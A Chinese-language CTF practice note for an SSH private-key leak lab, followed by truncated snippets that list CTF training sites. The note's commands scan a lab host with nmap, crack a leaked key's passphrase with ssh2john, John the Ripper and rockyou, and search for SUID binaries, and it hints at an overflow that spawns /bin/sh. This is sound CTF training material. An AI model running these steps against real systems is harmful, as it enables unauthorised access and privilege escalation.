1.掃瞄靶機開放的服務
nmap -sv 192.168.2.109#ssh -i 私匙 使用者名稱/id
ssh -i id_rsa [email protected]
#把私鑰檔案轉為john可讀,無法直接使用ssh2john時,使用locate查詢
locate ssh2john
ssh2john id_rsa > rsacrack
#zcat解壓kali密碼字典破解rsacrack檔案
zcat /user/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
#-prem -4000 suid
#/dev/null 避免錯誤輸出
find / -perm -4000 2>/dev/null
輸入20位元組+/bin/sh
ctf訓練 ssh私鑰洩露
1.給予在同一區域網中的攻擊機和靶場機器,以web方式可以訪問攻擊機,通過攻擊機來滲透靶場機器,獲取對應的flag值 一般情況下給於kali linux作為攻擊機,並且舉辦方提供計算機 給予乙個網線介面,使用者自備工具,直接連線網線,進行滲透靶場機器,獲取對應的flag值 這裡我們做乙個小練習 實驗...
CTF 題目訓練庫
首推 idf實驗室 題目非常基礎,只1個點 www.ichunqiu.com 有線下決賽題目復現 題庫 歷年題,練習場,比較難 www.wechall.net challs 非常入門的國外ctf題庫,很多國內都是從這裡刷題成長起來的 國外,入門,有移動安全 a方向 密碼,逆向酷炫遊戲代 http a...
CTF入門概要
ctf入門簡介 練習平台推薦 1.南郵ctf web題較為簡單,適合入門。其他題較難,短期內不建議寫。writeup多 2.bugku 優點是題量大。難度中等,writeup一般 3.實驗吧 沒寫過,不知道,據說題目難度中等 5.網路空間安全實驗室 題目較為簡單,適合入門學習。先就這麼多吧,以後再不...